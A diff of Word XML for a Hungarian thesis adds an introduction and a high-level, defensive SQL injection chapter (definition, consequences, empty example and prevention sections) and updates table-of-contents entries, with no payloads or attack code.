+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106702 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2147,7 +2346,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730698" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106703" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2191,7 +2390,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730698 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106703 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2211,7 +2410,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2237,7 +2436,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730699" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106704" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2281,7 +2480,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730699 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106704 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2301,7 +2500,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2327,7 +2526,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730700" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106705" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2371,7 +2570,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730700 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106705 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2391,7 +2590,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2416,7 +2615,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730701" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106706" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2444,7 +2643,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730701 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106706 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2464,7 +2663,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2489,7 +2688,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730702" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106707" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2517,7 +2716,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730702 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106707 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2537,7 +2736,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>7</w:t>
+              <w:t>9</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2562,7 +2761,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730703" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106708" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2590,7 +2789,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730703 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106708 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2610,7 +2809,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2671,6 +2870,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc70106696"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2680,16 +2880,692 @@
         </w:rPr>
         <w:t>BEVEZETÉS</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mai </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>világ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ban, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z informatika világában, a digitalizálás </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>visszafordíthatatlan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lletve </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>nem okszerű</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az informatika meglehetősen gyors fejlődése miatt, egy generáció már születésétől kezdve természetesnek vélheti az internethasználatot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A társadalom</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kiélvezi az összes kényelmi funkcióját</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, lebegnek a felszínen, a boldog tudatlanságban, az adataik</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>pedig</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>másod</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">percről </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>másod</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">percre </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>szivárognak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> le, a felszín alá.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Az információk megtartása és biztonsága ezáltal nyert a tudományágában külön területet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. Mivel értékesebbek lettek, mint a pénz maga.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Információbiztonságra szakosodó programtervező informatikusként állítom, hogy a szoftverfejlesztés nem minden. A bemeneti mezőket nem elég implementálni, meg is kell védeni őket. Ehhez pedig már több módszer van, annál is több példával. A programom mesterséges intelligencia segítségével ezeknek egy elenyésző részét használja fel a tanuláshoz és annak hasznosításához lehetőséget adva ezzel a fejlesztőknek arra, hogy biztonságos programkódot helyezzenek a „használók” elé.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A témaválasztásom egyszerű célja, hogy egy olyan kezdetleges rendszert készítsek, amely lehetőséget ad megvédi azt, ami a pénznél is drágább</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Bár az injektálás csak egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>része a biztonsági kockázatoknak, ám a legfenyegetőbb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A dolgozatban </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ki fogom fejteni</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> többek között</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ezt a fajta sérülékenységet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, a tanulási módszereket és a kettő ötvözetét egy programon keresztül, amely kimutatja a biztonságtechnikai fenyegetettséget.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:ind w:left="284" w:hanging="284"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc70106697"/>
+      <w:r>
+        <w:t>SQL INJECTION</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Cmsor2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="567" w:hanging="567"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc70106698"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Meghatározása</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Az SQL Injection napjaink leggyakoribb és legveszélyesebb sérülékenysége, amely a felhasználói input elégtelen mértékű validációjából ered.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="567" w:hanging="567"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc70106699"/>
+      <w:r>
+        <w:t>Példa</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Cmsor2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="567" w:hanging="567"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc70106700"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Következményei</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sikeres SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njection támadás képes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="567" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>érzékeny adatok kiolvasására az adatbázisból,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="567" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>adatbázis béli adatok módosítására (beszúrás, frissítés, törlés),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="567" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>adminisztrációs műveletek végrehajtására az adatbázisban (például a DBMS leállítására),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="567" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a DBMS fájlban található adott fájl tartalmának helyreállítására rendszerben, és </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="567" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egyes esetekben</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parancsokat ad ki az operációs rendszernek.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Cmsor2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="567" w:hanging="567"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc70106701"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Megelőzési módjai</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="567" w:hanging="567"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc70106702"/>
+      <w:r>
+        <w:t>Példa</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -2698,10 +3574,23 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:br w:type="page"/>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2713,12 +3602,11 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc69730697"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>SQL INJECTION</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc70106703"/>
+      <w:r>
+        <w:t>GÉPI TANULÁS</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2730,11 +3618,11 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc69730698"/>
-      <w:r>
-        <w:t>GÉPI TANULÁS</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc70106704"/>
+      <w:r>
+        <w:t>PROGRAM FELÉPÍTÉSE</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2746,27 +3634,11 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc69730699"/>
-      <w:r>
-        <w:t>PROGRAM FELÉPÍTÉSE</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Stlus1"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="284" w:hanging="284"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc69730700"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc70106705"/>
       <w:r>
         <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2813,7 +3685,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc69730701"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc70106706"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2823,7 +3695,7 @@
         </w:rPr>
